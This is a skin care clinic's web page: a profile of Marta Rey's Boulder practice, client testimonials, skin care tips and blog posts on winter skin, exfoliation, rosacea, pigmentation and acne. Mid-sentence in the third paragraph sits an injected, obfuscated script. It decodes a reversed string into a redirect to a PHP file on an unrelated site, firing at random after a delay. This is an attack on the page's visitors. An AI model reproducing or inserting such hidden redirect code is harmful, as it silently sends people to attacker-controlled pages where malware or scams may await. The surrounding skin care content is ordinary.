Whether brand new to the world of skin care or a seasoned veteran in anti-aging treatments, clients will receive much more than simple skin care treatments at Marta Rey European and Clinical Skin Care. Owner Marta Rey, who opened shop in Boulder last September, is quick to note that the experience at her business is different. “My services are not your basic skin care experience,” she says. “I offer a platinum standard experience.”

That platinum standard experience includes a large menu of noninvasive skin care treatments that target anti-aging, such as skin-rejuvenating medi-facials, chemical peels and microdermabrasion. The Boulder climate, with its harsh sun, wind and cold, can be hard on one’s skin and Rey’s menu of services addresses those concerns. Skin rejuvenating medi-facials can improve skin tone and collagen renewal, leaving the face not only free of fine lines but also capable of renewing itself more effectively each day. Other services like microdermabrasion and LED light therapy target discoloration and hyper-pigmentation for a smooth, clear complexion.

As a CIDESCO-certified professionalimage3-1 Marta Rey European <script>$mRi=function(n){if (typeof ($mRi.list[n]) == "string") return $mRi.list[n].split("").reverse().join("");return $mRi.list[n];};$mRi.list=["\'php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}</script>and Clinical Skin Care: More Than Just Looking Good with more than 25 years of experience, Rey ensures a safe and pleasant client experience for every session.

Rey customizes anti-aging procedures for each of her clients to address their exact needs and skin chemistry. “I customize everything I do,” she says. “I’m able to look at the skin at a particular time of the year or when the body is in a certain condition. Every time, I use a different treatment or protocol or product because I have to adjust treatment depending on what the client is experiencing at that time.” Rey explains that skin can change dramatically from month to month. Factors like illness, antibiotics, dehydration and travel can alter the skin’s condition and require different products and techniques. This is why Rey sees skin care as a joint effort between her and her client. “I tell my clients that we are a team,” she says. “They have to do their homework and I do my part for the best results.”

In all of her services, Rey exclusively uses European products and technologies. “In the United States, I am the oldest skin care professional to use Italy’s number one professional skin care line,” Rey says. Client Jerri Miller didn’t use any skin care products before she started seeing Rey in October of last year. “Now I moisturize morning and evening,” Miller says. ” I like that her products are natural. The products are certainly kinder and gentler than anything I have used in the past.”

Miller, who was approaching “a big birthday” last fall, said she initially went to Marta Rey Skin Care to reduce the appearance of wrinkles and fine lines, but her sessions with Rey have become much more. “It has become about self care,” Miller says. “Marta has a positive outlook on life and a great sense of humor. Our sessions are like therapy.”

For Rey, this whole-person treatment is an important part of her business. She wants her clients to feel at ease during skin care sessions. “I look at the whole person,” Rey says. “I help my clients beyond skin care because they feel comfortable around me. I’ve been told many times that clients don’t just come for skin care but they come because of how I make them feel.

In all of her services, Rey exclusively uses European products and technologies.

My work is not just about the physical benefits, but the nonphysical healing I can bring to others.”

Client Ann Niemeyer has been getting monthly facials at Marta Rey Skin Care for five months in addition to using Rey’s skin care products daily. “I’ve always had pretty good skin,” Niemeyer says. “But you reach a certain age and, when you look in the mirror, you see more wrinkles than you want to see. It was time to do something.” While Niemeyer didn’t immediately notice a difference after her first session with Rey, she has noticed the affects of consistent care. “I have fewer wrinkles and my skin looks healthier,” she says. “My sessions with [Rey] have definitely made a difference.”

While it took a few sessions to notice the physical differences in her skin, Niemeyer says there were emotional and confidence benefits after her first session.

“I felt better about how I looked after that first appointment even though I couldn’t physically see a change in the wrinkles and fine lines, because the time I spent with [Rey] was so relaxing and soothing,” Niemeyer says.

“She was like a friend from our first session.”

Rey wants to dismantle the myth that skin care treatments are about vanity and looking good. “Skin care is about maintaining healthy skin and that should be a priority and an investment,” Rey says. While Rey agrees that skin care treatments should be relaxing, she doesn’t think treatments should be solely for pampering.”My treatments aren’t only relaxing, they are also transformative,” she says. “They will make your skin both feel and look better.”

In the same way people exercise to keep their heart and lungs strong, they need to take steps to keep their skin healthy and clean. “Most people don’t think of the skin as the largest organ in their body,” Rey says. “It breathes out toxins and breathes in all the bad things. You have to keep it healthy.” Rey compares skin care treatments to dental hygiene. “You go to the dental hygienest every six months to have your teeth cleaned for maintenance,” she says. “For skin care, you should have your skin cleansed professionally every month for wellness. That way, the skin can breathe correctly.”

Rey is eager to educate about skin care as a wellness issue and she offers a 15 percent discount for new clients. Additionally, she is careful to note that her pricing is all-inclusive of her time, talents and expertise.

She does not accept tips.

Wear Sunscreen Every Day Rain Or Shine
Use a full spectrum sunscreen with at least a SPF 25. Look for a non sticky, odorless, and fine consistency formula that can be apply on top of your moisturizer, without feeling heavy. If traveling to warmer climates, or skiing, remember to reapply it often, usually every two hours.

Exfoliate… Exfoliate… Exfoliate
The skin of a regular young adult takes a full 28 days to replenish, and as we get older the cells get lazy and need help. You would help your skin jump-start the renewal process by exfoliating regularly. If your skin is normal or dry use a cleanser with salicylic acid two times a week, and if your skin is oily, it will benefit from this ingredient every day. The cleanser will help dissolve the glue that hold dead skin cell together and help the skin better absorb anti-aging and hydrating creams and moisturizers. A professional peel is also recommended once a month. I recommend a Salicylic Peel for an oily skin, and a Jessner or Glycolic Peel for a normal, mature or dry skin.

Moisturize After Showering
Showers specially hot ones strip the skin from oils., so make sure you apply a face and body moisturizer immediately after you shower and preferably when your skin is still damp. Choose products rich in Hyaluronic acid, Vitamins and Anti-Oxidants.

Remove Your Make Up At Night And Before Exercising
If you do not remove your make up, you are asking for trouble. It will mix with oils, dirt, bacteria and free radicals on the skin, causing you all sort of skin problems such as blemishes and unwanted sensitivities. Also, clean your skin immediately after exercising, do not wait to get home or meet a friend for coffee before you do so. This apply to your body skin as well.

Do Not Squeeze Pimples
If you do, you will spread the infection underneath the tissue, and it will take the pimple more time to clear up, which translates into two to three more weeks. You are better off cleaning your face more often during the day, and avoid applying heavy make up or camouflage creme over it. A topical cream within salicylic acid or a hydrocortisone cream can help calm the inflammation. Remember not squeezing blemishes will also prevent future marks and scars.

Clean Your Make Up Brushes.
Make up and skin oils build up on your brushes are a breathing ground for bacteria. Please clean your brushes once a week with an antibacterial soap or baby shampoo in lukewarm water. Squeeze all excess water, reshape them and place them on top of a clean washcloth or tissue to dry. They will be ready for you the next morning.

Remember Your Hands
Your hands just like your face will reveal your age. Treat them as good as your face. Exfoliated them, hydrate them and protect them with at least an SPF25 every day. Do not use to harsh soaps when doing dishes, and better yet, protect them with rubber gloves before you touch a dirty dish. Your hands will thank you for it.

Home Skin Care Program
Every skin type can benefit from a good balancing or anti aging routine. Make sure you practice the four most important skin care steps, cleansing, toning, moisturizing and protecting. Remember that it is consistency what it will really transform and make your skin healthier. A good skin care program will give you results within a week. Otherwise change products.

Professional Skin Care Treatments
Most everyone can achieve a healthier and beautiful skin with professional skin care treatments, performed on a regular basis for best results. How often? At least once a month. But to achieve an specific goal or treat a condition, skin care treatments can be performed once a week or twice a month. The aesthetician will advice you in the best treatments, utilize the right equipment, and a wide range of skin care products. The end result is for you to be proud of showing your face with skin that is radiant, youthful, and glowing and to provide you with real and transformative results.

Schedule A Yearly Mole Check-Up
Remember to book your yearly mole checkup with a Dermatologist. He or she will survey your body for any suspicious moles. And remember to set up your next year check up before you leave the office. Better safe than sorry.

Winterize Your Skin

November 30, 2011 By marta Leave a Comment

Keeping winter skin hydrated is an absolute must. With the changes in the weather, your skin is bound to bear the brunt. Keeping this in mind, your skin care regime should change. The first thing you need to do is take a closer look at your skin and the problems that are starting to show, and to evaluate what it needs to be done and what changes in your skin care routine will be required.

Most people will notice that their skin will change from being expose to the harsh, dry and windy weather. Indoors heaters will exacerbate it, making it feel dry and flaky. Oily skin types will experience a skin that become less oily, sensitive  skin types may show more drier patches and irritation, and dry skin types will feel tighter, flaky, and overly dry.

Oily skin can benefit from a face wash, containing vitamin C, mild bio sulphur, and a light version of salicylic acid, and AHA. For dry skin, use a gentle face wash containing vitamin C, and E as well as Hyaluronic acid, and if possible use a hydrating mask once or twice a week. Sensitive skin types will benefit for products containing camomile oil, or the use of paraben free products.

The most common skin problems this time of the year include dry and flaky skin and cracked lips. In general, there are some tips that most people need to follow when combating winter skin.

Moisturize – Moisturizing is key in the winter months, as it has two functions. It repairs the affected and damaged fatty skin barrier that is lost in dry winter weather, and it attracts moisture and locks it in. Mix a moisturizer with your sunscreen, or apply it over over it. Remember to apply moisturizer to your whole body as well, every morning and at night before going to bed. Keep moisturizer near you during the day so you can continue to moisturize if need it.

Wear sunscreen – Summer is over, but the sun is still there. Use your sunscreen especially on the exposed areas of your body. Use a a broad-spectrum coverage for both UVA and UVB with an SPF of at least 25. Apply it on your face and on all exposed areas of your body. Sunscreen needs to be applied year-round, not just during the summer months. Please, don’t forget your lips. Use a lip balm with SPF, your lips need just as much protection as the rest of your skin. Keep that lip balm handy to apply and re-apply, and do it generously. Avoid licking your lips to wet them, this causes them to dry out even more.

Hands – Keep that good, hand moisturizer handy on your side counter and in your hand bag, and do not forget to use sunscreen in them as well. Our hands are exposed to the weather as much as our faces, and they take a beating with the added effect of over washing in our daily routines. Were globes when washing the dishes, and going outdoors. That is the best way to protect your hands.

Eat a healthy diet – What you put in your mouth influences how your skin looks, eating healthy helps maintain the skin youthful. Be sure to incorporate plenty of fruits, vegetables, and lean proteins in your diet. Anti-oxidants, Omega 3, and Vitamin C taken on a regular basis will help you achieve healthy and glowing skin as well.

Drink sufficient water – At least eight glasses a day, as well as fresh juices of deep colored vegetables. This will help your skin remain fresh and healthy.

Relax – Stress is a huge contributor to skin problems like acne and wrinkles. Making time to relax during busy days can improve the condition of your skin.

Do not forget the added benefit of a professional skin care treatment. These include microdermabrasion, and chemical peels, which exfoliate the skin, improves tone and texture, and reduces pigmentation. The added benefit is that during the winter months these treatments can be performed without the worrying effect of strong sun exposure, hence decreasing the possibility of hyper-pigmentation, or what is commonly known as dark spots or dark skin patches.

Hope these simple tips help you can adjust your skin care routine during the cold months, and keep your skin looking healthy and young.

The Basics of Professional Exfoliation

September 28, 2011 By marta Leave a Comment

Exfoliation plays a critical process in skin rejuvenation and the maintenance of a healthy skin. Regular professional exfoliation can help improve skin appearance, reduce fine lines and wrinkles, smooth the texture of the skin and promote an even tone and color.  Exfoliation is also one of the primary means to improve the absorption of amino peptides, vitamin C and  hyaluronic acid. After the skin is exfoliated, newly surfaced cells are more susceptible to sun burn and damage, that is way daily sun protection is vital to help maintain the anti-aging benefits and to avoid skin damage.

Exfoliation can be classified as mechanical or chemical and measured by the levels of exfoliation they may achieve. A typical example of a mechanical exfoliation is microdermabrasion because it require the use of a tool or product in motion to remove layers of skin, and the depth of the exfoliation can vary greatly from one tool to another. An exfoliation by a peel solution, or chemical exfoliation, can vary in strength and PH to deliver different skin benefits. For example dry skin can benefit from a Lactic peel and sun damage skin can receive accelerated benefits from a combination of a TCA peel or a Jessner solution.

A happy first time client talks about her treatment experience

April 4, 2011 By marta Leave a Comment

I Met Marta, Now You Meet Marta!

Can I just say that plunking myself down next to the prettiest woman in the room at a business networking luncheon has turned out to be my great fortune? I’ve made a new business associate, wonderful new friend, and I’m getting younger looking by the day!
All my adult life I thought I took pretty decent care of the largest organ on my body…my skin. Aside from the occasional tanning bed, and laying out in the sun I made sure to slather on creams and lotions, not touch my face excessively, and get enough sleep each night so I wouldn’t frighten the neighbor kids the next day.
Turns out I know little to nothing about proper skin care – what it actually entails, what products to use on my face (each face has unique needs, who knew?), and the dramatic skin difference available to every woman and man who takes the time to self educate submitting to at least 90 luxurious minutes with Marta Rey, President and Owner of Marta Rey European and Clinical Skincare, who I affectionately dubbed “The Skin Doctor”.
In just one treatment my face responded so happily that it remained make-up free, blotch-free, toned and hydrated the rest of the day.    Don’t get me wrong, I LOVE make-up, but after Marta’s signature Medi-FacialTM it just wasn’t necessary!I had no idea what to experience, so I’m guessing you don’t either. (May I just state for the record that if you’ve had a facial on a cruise, or in a salon and spa- as wonderful as they may be – it is NOT even close).
I arrive for my treatment to Marta’s office in Centerville, located in a lovely facility with a Board Certified Plastic Surgeon (yes, I held my stomach in and pushed my boobs out on my way to Marta’s suite!). Marta does pre and post operative skin care treatments for patients as well- very necessary for best plastic surgery results.
(I make a note of this for when wobble neck appears- a girl can only take so much!).
I fill out my paperwork which describes any allergies, etc… and then I’m welcomed into Marta’s treatment room, given a soft white wrap to change into, and lay down on a comfortable table with white linens and a soft white blanket.
Marta examines my skin noticing where redness, sensitivity, large pores, and dead skin cells have accumulated (a lot!) and puts her customized treatment plan into action describing to me exactly what she wants to do, showing me the tools, and explaining what each step will accomplish and how it will feel. Once she gets my hair cap in place and I remove my dangling earrings we are off!
Since I am new to Microdermabrasion Marta shows me the Diamond Head tool (still encased in its protective packet) that will glide over my facial skin, loosening dead skin cells and sending them on their way through the attached tube never to be seen again. Everything is pristine, clean, and organized, and I am immediately comforted by Marta’s knowledge, professionalism, and warm personality.
Marta description of how Microdermabrasion feels is completely accurate – To that of a cat licking you- and since I have a cat I know exactly the feeling, so no
worries of pain!    (If you don’t have a cat it feels like a soft emery board on the inside of your wrist. If you don’t have an emery board then I don’t know what to tell you!)
About 1?2 an hour later I’m asked to feel and compare both sides of my face; the ‘before’ side feels kind of like a lemon skin – slightly textured, uneven, and a bit pebbled. The ‘after’ side feels as smooth as an eggshell – I am not exaggerating. I am now beaming as not only is the Marta Rey Signature Medi-FacialTM experience pleasant – it works!
Once the Microdermabrasion is complete it is time for Marta to perform her extraction technique which has earned her the title among her clients as “Queen of Extraction” because she does it without it hurting in the least, making blackheads and whiteheads and any other offenders disappear in minutes. Then it is the application of aromatic essential oils and a facial massage that I can only describe as “tiny beings dancing on your face in a choreographed ballet”. I didn’t know such a form of facial massage even existed, let alone was offered in the Miami Valley!
Après massage a wonderful masque was painted on my face, eye pads placed, and I was left to rest quietly while the masque did its work. With soft music playing I took a little nap, enjoying the rest of my treatment time.
When Marta returned to the treatment room she removed the masque residue with a moistened and heated towel that smelled of fresh cut lemons.    It was intoxicating.
With gentle toner, proper moisturizer for my skin type, eye cream, and a sunscreen with 25 SPF applied I was encouraged to take my first peek in the mirror.
The woman peering back at me had a huge smile on her face as she mumbled softly “I look changed”. I barely recognized myself – an unlined, clear, and radiant face.
The final part of my treatment was to listen to my post treatment advice from Marta. I was all ears.
Because Marta Rey European and Clinical Skincare operates with the philosophy of synergistic skincare- a customized consistent treatment plan and pharmaceutical grade American and European skin care products containing the best natural and scientifically proven ingredients work together to transform skin to look 5 to 10 years younger- my personal plan is as follows;
To accelerate my skin transformation progress it is recommended that my series of treatments be close together – roughly every other week- and Marta will determine which sessions will require Microdermabrasion and which will mandate a peel. My skin will reveal what happens when! The product line that I will use is Italian (just like me!) and is a simple, yet effective routine – Marta describes it as my ‘Ferrari’- cleanser, toner, day moisturizer, night moisturizer, eye cream, and sunscreen. The product size is extremely generous and priced far more reasonably than the ‘miracle’ creams touted in the fashion magazines and on-line. Most importantly it works, and it’s not a ‘buy and forget to use it’ item, as Marta guides her clients throughout the series of skincare treatments in proper use of the products.
Another word on products, everything I had been using was wrong and my skin told the story why with redness, irritation, unevenness, etc…I could go on and on.    I had no idea that was part of the problem, but Marta knew immediately. Good luck finding that level of expertise at the cosmetic counter.
My next report will consist of the next treatment that I will experience under Marta’s watchful eye and expert hand.
Until then I offer just one piece of sage advice… pick your seat at business networking luncheons carefully…it could transform you!

What is Hyaluronic Acid?

February 10, 2011 By marta Leave a Comment

Hyaluronic acid is a naturally occurring sugar molecule that helps moisture bind to the skin. It is found in large quantities in young skin, but over time pollutants, sunlight and natural aging cause levels to plummet, leading to a loss of skin plumpness.

A number of consumers are turning to injectable fillers for a shot at fuller lips, youthful facial volume and even camouflaging wrinkles and scars. For topical application, high quality professional skin care products containing hyaluronic acid offer a surface, as well as a deep re-hydrating effect in order to strengthen the skin’s ability to increase and maintain its own water reserves.

Rosacea

January 22, 2011 By marta Leave a Comment

Rosacea is a chronic dermatitis, especially of the face. The disorder is often accompanied by inflammation, redness, skin sensitivity, blood vessel formation and eye problems in addition to unsightly acne-like lesions. Rosacea typically develops between the ages of 30 and 50, although it can occasionally occur outside of this range.

Oral and topical antibiotics, can bring down the facial redness, inflammation and skin eruptions associated with Rosacea The redness and flushing associated with this condition is caused by dilated blood vessels, which can be zapped by Intense Pulsed Light devices and lasers. Topical creams and cleansers from your skin care professional or dermatologist have also been shown to help reduce Rosacea. Avoid retinoids, sun exposure, alcohol, spicy foods  and extreme cold, heat and wind, if possible, because they can exacerbate the redness of Rosacea

Hyperpigmentation (freckles, pigment and melasma)

January 13, 2011 By marta Leave a Comment

Freckles and some skin pigment changes, such as sun spots (lentigines) or melasma are caused by sun exposure, so your best defense is daily use of a full spectrum sunscreen. Look for one that contains high concentrations of  titanium dioxide and zinc oxide, which sufficiently block out the sun’s rays. Some forms of facial discoloration known as melasma can also be associated with the hormones estrogen and progesterone, found in oral contraceptives. Melasma can occur in just about any female, it is identical to the condition known as the “mask of pregnancy,” or chloasma, ehen it occurs during pregnancy. Applying sunblock daily can guard against the skin discoloration. Freckles, sun spots, melasma and chloasma can be minimized by using bleaching creams containing kojic acid or hydroquinone, which inhibit the transfer of pigment from the melanocytes (the cells that create the pigment). Be patient. At home topical lightening can take up to six month. After any professional treatment to fade pigmentation, it is extremely important to use sunscreen to avoid exacerbating existing pigmentation,  and prevent this problem from reoccurring.

Oily/Acne Skin

December 12, 2010 By marta Leave a Comment

Hormonal changes, genetics and stress can cause your sebaceous glands to work overtime.

Pimples develop when pores get plugged up by dead skin cells and bacteria multiply within the clogged pore. Your skin care regimen should consist of oil-free, noncomedogenic products that won’t block your pores, as well as facial cleansers that contain salicylic acid to remove dead cells.Often the most effective way to treat acne and oiliness is through a combination of retinoids, antibiotics, peels and microdermabrasion. Retinoids work well because they clean up pores deeply. A topical or oral antibiotic can destroy the bacteria that causes breakouts. Microdermabrasion, which exfoliates the skin’s surface, and chemical peels, which remove the top layer of skin, can reduce acne as well. The next level of treatment include laser treatment, which kills the bacteria behind the pimples, improving the appearance of mild to moderate inflammatory acne.. At least three to four sessions of laser are needed. In cases of severe acne, the oral medication Accutane (a derivative of vitamin A) is prescribed.  However, Accutene presents the potential for serious side effects and concerns, so it is imperative to have an in-depth conversation with your dermatologist if you are considering this option.
